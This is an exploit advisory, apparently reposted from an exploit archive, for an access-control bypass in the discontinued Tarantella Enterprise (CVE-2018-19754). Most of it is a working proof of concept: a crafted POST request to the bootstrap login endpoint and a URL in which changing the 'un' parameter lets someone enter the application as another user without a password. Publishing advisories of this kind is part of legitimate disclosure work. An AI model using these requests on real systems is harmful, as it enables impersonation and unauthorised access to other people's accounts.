Tarantella Enterprise Security Bypass Vulnerability

<!--
# Exploit Title: Security Bypass Access Control Vulnerability in Tarantella
Enterprise before 3.11
# Exploit Author: Rafael Pedrero
# Vendor Homepage: Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: the product is discontinued (vulnerability found in 2009)
# Version: Tarantella Enterprise before 3.11
# Tested on: All
# CVE : CVE-2018-19754
# Category: webapps


1. Description

Tarantella Enterprise before 3 3.11 allows a Bypass Access Control, the
application does not prevent one user from gaining access to another user's
by modifying the parameter value in a login request.


2. Proof of Concept

Send POST petition like:

POST
/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html
HTTP/1.1
Accept: */*
Referer: https://XXXX.XXXX:444/html/form_ttaXXXX.html
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.1; .NET CLR 2.0.50727)
Host: ttarima.cnso
Content-Length: 61
Connection: Keep-Alive
Cache-Control: no-cache

action=bootstrap&pg=index.html&px=DIRECT&un=<usename>&ms=unique

Where the parameter un is the username you know. You recive the message:

"The content of this file must be language independent! This applet
immediately loads a new document in a named frame (here WebtopFrame), which
will be something like: ../logintheme/clientcap/index.html. The logintheme
is determinated from the appropiate attribute in the datastore. -->"

And now, change the username to access to application:

https://XXX.XXX/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html?action=bootstrap&pg=index.html&px=DIRECT&un=
<valid_username>&ms=unique


3. Solution:

The product is discontinued.
https://www.oracle.com/us/assets/lifetime-support-hardware-301321.pdf

-->

#  0day.today [2019-01-21]  #